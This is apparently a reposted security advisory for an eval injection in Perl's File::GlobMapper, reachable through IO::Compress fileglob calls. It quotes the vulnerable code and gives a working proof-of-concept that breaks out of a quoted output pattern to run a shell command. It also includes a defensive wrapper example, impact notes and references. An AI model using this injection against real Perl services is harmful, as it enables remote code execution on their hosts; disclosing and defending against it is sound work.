## https://sploitus.com/exploit?id=PACKETSTORM:223138
### Summary

An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.
No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.

---

### Details

`File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without any sanitisation:

**`lib/File/GlobMapper.pm:316–321`**
```perl
$string =~ s/${noPreBS}#(\d)/\${$1}/g;
$string =~ s#${noPreBS}\*#\${inFile}#g;
$string = '"' . $string . '"';      # wrapped in double-quotes
$self->{OutputPattern} = $string;   # stored verbatim — no escaping
```

**`lib/File/GlobMapper.pm:342`**
```perl
eval "\$outFile = $self->{OutputPattern};" ;   # executed — injection point
```

`File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` / `IO::Uncompress::*` function are fileglob strings (delimited by `< >`). This is a documented, common calling convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.

Any character that closes the surrounding double-quoted Perl string — a literal `"`, a backtick, `${...}`, or `@{...}` — followed by arbitrary Perl code is executed verbatim.
    
---

### PoC

Save as `poc.pl` and run with `perl poc.pl`:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use IO::Compress::Gzip qw(gzip);

my $dir      = tempdir(CLEANUP => 1);
my $sentinel = "/tmp/CVE_GlobMapper_RCE_$$";

# Create a legitimate input file that the input glob will match
open my $fh, '>', "$dir/test.txt" or die $!;
print $fh "data\n";
close $fh;

my $malicious = qq(<$dir/out.gz"; system("touch $sentinel"); #>);

print "Sentinel before: ", (-e $sentinel ? "EXISTS" : "absent"), "\n";

eval { gzip "<$dir/*.txt>" => $malicious };

if (-e $sentinel) {
    print "EXPLOITED — arbitrary command executed via eval injection\n";
    print "Sentinel: $sentinel\n";
    unlink $sentinel;
} else {
    print "Did not fire (check error: $@)\n";
}
```
    
**Expected output:**
```
Sentinel before: absent
EXPLOITED — arbitrary command executed via eval injection
Sentinel: /tmp/CVE_GlobMapper_RCE_<pid>
```

Confirmed on IO-Compress 2.219 / Perl 5.40.1 / Ubuntu 26.04.
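As an added defensive example (not part of the advisory and not IO-Compress's own code): a wrapper that never uses the fileglob-to-fileglob calling convention, so a user-supplied output template can never reach `File::GlobMapper`'s `eval`. The function names, the `*`-for-basename template rule and the rejected character set are assumptions of this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Basename qw(basename);
use File::Spec;
use File::Temp qw(tempdir);
use IO::Compress::Gzip qw(gzip $GzipError);

# Reject any template that could close the double-quoted string which
# File::GlobMapper wraps around the output pattern: " ` $ @ and backslash.
# Directory separators and '..' are refused too (single file in $out_dir).
sub validate_output_template {
    my ($tmpl) = @_;
    return 0 if !defined $tmpl || $tmpl eq '';
    return 0 if $tmpl =~ /["`\$\@\\\/]/;
    return 0 if $tmpl =~ /\.\./;
    return 1;
}

# Compress every file matched by $in_glob. The output name is computed in
# plain Perl ('*' in $template stands for the input basename) and gzip() is
# called with one concrete input path and one concrete output path, so
# File::GlobMapper, and with it the eval, is never reached.
sub gzip_each {
    my ($in_glob, $out_dir, $template) = @_;
    validate_output_template($template)
        or die "refusing unsafe output template: $template\n";
    my @written;
    for my $in (glob $in_glob) {
        next unless -f $in;
        my $base = basename($in);
        (my $name = $template) =~ s/\*/$base/g;
        my $out = File::Spec->catfile($out_dir, $name);
        gzip $in => $out or die "gzip failed for $in: $GzipError\n";
        push @written, $out;
    }
    return @written;
}

# Constructed sample run (not from the advisory).
my $dir = tempdir(CLEANUP => 1);
open my $fh, '>', "$dir/test.txt" or die $!;
print $fh "data\n";
close $fh;
print "compressed: ", join(' ', gzip_each("$dir/*.txt", $dir, '*.gz')), "\n";

# A template shaped like the PoC's breakout is rejected before any eval.
my $hostile = q(out.gz"; 1; #);
print "hostile template accepted? ", (validate_output_template($hostile) ? 'yes' : 'no'), "\n";
```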
    
---

### Impact

This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.

**Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input, such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.

In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (≈ 2005) and is present on every Linux distribution that ships the `perl` package.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-48962
- https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch
- https://github.com/pmqs/IO-Compress/issues/73
- https://metacpan.org/release/PMQS/IO-Compress-2.220/changes
- http://www.openwall.com/lists/oss-security/2026/05/27/4
- https://github.com/advisories/GHSA-q6wx-vhvq-x7h6